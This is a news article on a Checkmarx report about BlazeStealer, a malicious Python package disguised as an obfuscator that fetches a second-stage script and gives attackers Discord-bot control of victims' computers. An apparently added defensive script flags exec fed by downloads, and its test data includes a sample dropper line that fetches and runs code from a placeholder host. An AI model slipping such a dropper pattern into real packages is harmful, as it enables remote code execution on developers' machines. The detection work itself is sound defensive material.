Python Developers Targeted by Malicious Package

In a recent report by cybersecurity firm Checkmarx, researchers have uncovered a new wave of malware targeting developers working with the widely-used Python language. Specifically designed to infect computers of developers seeking to obfuscate their code, these malicious packages masquerade as legitimate tools, often appearing in open-source code libraries.

According to Checkmarx, attackers have capitalized on the growing trend of developers using tools to obfuscate their code, making it unreadable to unauthorized individuals. This year, the researchers note a surge in attackers posting packages with deceptive names, introducing a sinister element into the mix. The report, released on Wednesday, highlights the latest package named “BlazeStealer,” discovered in October, which carries a “destructive payload.”

Once a developer executes the code, BlazeStealer activates, retrieving an additional malicious script from an external source. This script enables a bot on the Discord messaging service, providing attackers with complete control over the victim’s computer. Checkmarx emphasizes that developers seeking to obfuscate their Python code become attractive targets due to their likely involvement with valuable and sensitive information.
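As an added defender-side illustration, not code from the Checkmarx report or the article, the following heuristic flags the behaviour just described: Python source that downloads content and passes it straight to `exec()` or `eval()`, which is how a package fetches its stage-two script at install or import time. The function names, the placeholder URL and the two sample snippets are constructed for this example.

```python
import ast

FETCH_FUNCS = {"urlopen", "urlretrieve"}   # urllib.request helpers
HTTP_CLIENTS = {"requests", "httpx"}       # requests.get(...), httpx.post(...)

def _is_fetch(call: ast.Call) -> bool:
    """True if this call looks like an HTTP download."""
    f = call.func
    if isinstance(f, ast.Name):
        return f.id in FETCH_FUNCS
    if isinstance(f, ast.Attribute):
        if f.attr in FETCH_FUNCS:
            return True
        return (isinstance(f.value, ast.Name) and f.value.id in HTTP_CLIENTS
                and f.attr in {"get", "post"})
    return False

def _contains_fetch(node: ast.AST) -> bool:
    return any(isinstance(n, ast.Call) and _is_fetch(n) for n in ast.walk(node))

def find_remote_exec(source: str) -> list:
    """Return (line, 'exec'|'eval') for every exec/eval fed by a download,
    either inline or via a name assigned from one (direct flow only)."""
    tree = ast.parse(source)
    tainted = set()
    # pass 1: names assigned from a fetch, e.g. payload = urlopen(url).read()
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign) and _contains_fetch(node.value):
            tainted.update(t.id for t in node.targets if isinstance(t, ast.Name))
    # pass 2: exec/eval whose arguments download inline or reference a tainted name
    findings = []
    for node in ast.walk(tree):
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in {"exec", "eval"}):
            uses_taint = any(isinstance(n, ast.Name) and n.id in tainted
                             for a in node.args for n in ast.walk(a))
            if uses_taint or any(_contains_fetch(a) for a in node.args):
                findings.append((node.lineno, node.func.id))
    return findings

# Constructed samples with a placeholder URL; not the real package's code.
STAGE_TWO_DROPPER = '''
from urllib.request import urlopen
payload = urlopen("https://example.invalid/stage2.py").read()
exec(payload)
'''
BENIGN = '''
import json
cfg = json.loads(open("cfg.json").read())
'''

if __name__ == "__main__":
    print(find_remote_exec(STAGE_TWO_DROPPER))  # [(4, 'exec')]
    print(find_remote_exec(BENIGN))             # []
```

Running it over a package's setup.py and top-level modules before installation is a cheap pre-install check; it tracks only direct assignments, so obfuscated or indirect flows still need a sandboxed install with network monitoring.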

The malicious packages often adopt names resembling clean Python obfuscators, with the October discovery labeled as “pyobfgood.” Once fully operational on the victim’s machine, it opens the door to a range of malicious activities, including data exfiltration, keystroke logging, and direct spying.

Checkmarx points out that the Discord bot, once activated, can secretly capture a photo using the victim’s webcam. The captured image is then transmitted back to the Discord channel, leaving no evidence of its presence after deleting the downloaded files.

The incident underscores the increased scrutiny on open-source code libraries, where attackers are exploiting vulnerabilities to disseminate malware. Earlier this year, cybersecurity company Phylum warned of a rise in attack sophistication targeting developers and package ecosystems. Notably, a vulnerability in the libwebp library drew attention in September, while previous research by Checkmarx revealed malicious scripts targeting the banking sector within packages in the npm JavaScript registry.

Against this backdrop, the Biden administration has been urging the industry to enhance efforts in securing open-source software, recognizing the growing significance of these platforms in the digital landscape.
